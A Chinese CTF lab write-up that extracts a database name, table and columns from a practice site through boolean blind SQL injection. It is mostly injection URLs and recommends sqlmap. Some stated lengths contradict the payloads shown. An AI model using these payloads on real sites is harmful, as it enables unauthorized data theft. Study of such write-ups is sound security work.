时间:2017.9.29
题目链接:www.shiyanbar.com/ctf/1909
解题思路:类型为 bool 型的盲注,数据库为MySQL
1) http://ctf5.shiyanbar.com/web/index_3.php?id=1 and 1=1 / 1=2 没有变化
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and '1'='1 / '1'='2 有变化
得出结论:这是关于bool的盲注
2) http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(database())>0,这语句老是报错,我知道是单引号没闭合,但是不知道该怎么写,后来就用sqlmap跑了一下,知道了正确的写法应该是这样写的,得出当前数据库长度为4
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(database())=4 and '1'='1
3) http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr(database(),1,1))=119 and '1'='1 —— w http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr(database(),2,1))=101 and '1'='1 —— e http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr(database(),3,1))=119 and '1'='1 —— b http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr(database(),4,1))=49 and '1'='1 —— 1 得出数据库名为 web1
4) http://ctf5.shiyanbar.com/web/index_3.php?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 and '1'='1 —— 得出web1数据库中有2张表
5) http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=4 and '1'='1 ——第1张表名长为 4 http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=4 and '1'='1 —— 第2张表名长为5
6) 先猜第1张表名
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=102 and '1'='1 —— f http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=108 and '1'='1 —— l http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=97 and '1'='1 —— a http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=103 and '1'='1 —— g
7) 然后猜解flag表中字段数
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and (select count(column_name) from information_schema.columns where table_name='flag')=2 and '1'='1 —— flag 表中只有2个字段
8) 猜解flag 表中2个字段长度
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),1))=4 and '1'='1 —— 第1个字段长4 http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(substr((select column_name from information_schema.columns where table_name='flag' limit 1,1),1))=4 and '1'='1 —— 第二个字段长2
9) 猜解flag 表中2个字段名称
http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),1,1))=102 and '1'='1 —— f http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),2,1))=108 and '1'='1 —— l
以此类推
10) 猜解数据
都是这样的步骤,手工注入好繁琐啊,可以直接用sqlmap,比较快